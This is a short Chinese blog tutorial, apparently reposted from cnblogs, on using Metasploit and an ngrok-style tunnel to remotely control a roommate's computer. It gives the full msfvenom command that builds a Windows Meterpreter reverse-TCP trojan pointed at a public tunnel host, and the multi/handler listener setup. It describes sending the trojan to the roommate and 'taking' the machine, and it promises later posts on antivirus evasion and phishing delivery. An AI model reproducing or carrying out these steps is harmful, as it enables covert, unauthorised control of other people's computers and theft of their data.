编程语言
首页 > 编程语言> > 用metasploit映射公网远程控制舍友电脑

用metasploit映射公网远程控制舍友电脑

作者:互联网

用metasploit映射公网远程控制舍友电脑

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。

实验原理:用metasploit制作木马,发送到目标主机上,双击运行后反向连接到ngrok监听的端口,由ngrok指定的端口传输到kali监听的端口,从而控制目标主机

  1. 打开kali
  2. 下载sunny,网址www.ngrok.cc,注册后

 

 

 

 

 

 

免费购买一个tcp连接的服务器隧道,

 

 

 

 

 

 

保存好自己的隧道id,第四步会用到

  1. https://www.ngrok.cc/download.html,下载对应的sunny(ngrok客户端),比如我的kali是64位的,就下载64位的

     

     

查看kali处理器架构使用命令:arch

 

 

 

 

 

 

 

4,

切换到sunny所在的目录,输入chmod 777 ./* 对当前文件夹的文件加上权限,再输入./sunny clientid [先前保存的id],启动映射隧道

 

 

 

 

 

 

 

 

  1. 新建一个终端窗口,进入超级管理员权限,msfvenom -p windows/meterpreter/reverse_tcp lhost=vipgz6.91tunnel.com lport=10663 -f exe > shell.exe
  2. 将生成的木马传给舍友,

     

     

目前我们先不考虑对木马的伪装以及免杀

  1. kali打开msfconsole,输入以下命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 6666

exploit

 

 

 

7.双击舍友电脑上的木马,成功上线

 

 

 

8.查看他的ip

 

 

 

 

 

 

  1. 验证一下吧
  2. 拿下!

免杀和木马伪装以及如何钓鱼将木马发送给舍友请关注qq群后续分享

标签:metasploit,kali,sunny,舍友,tcp,木马,公网,ngrok
来源: https://www.cnblogs.com/mel0n/p/16640552.html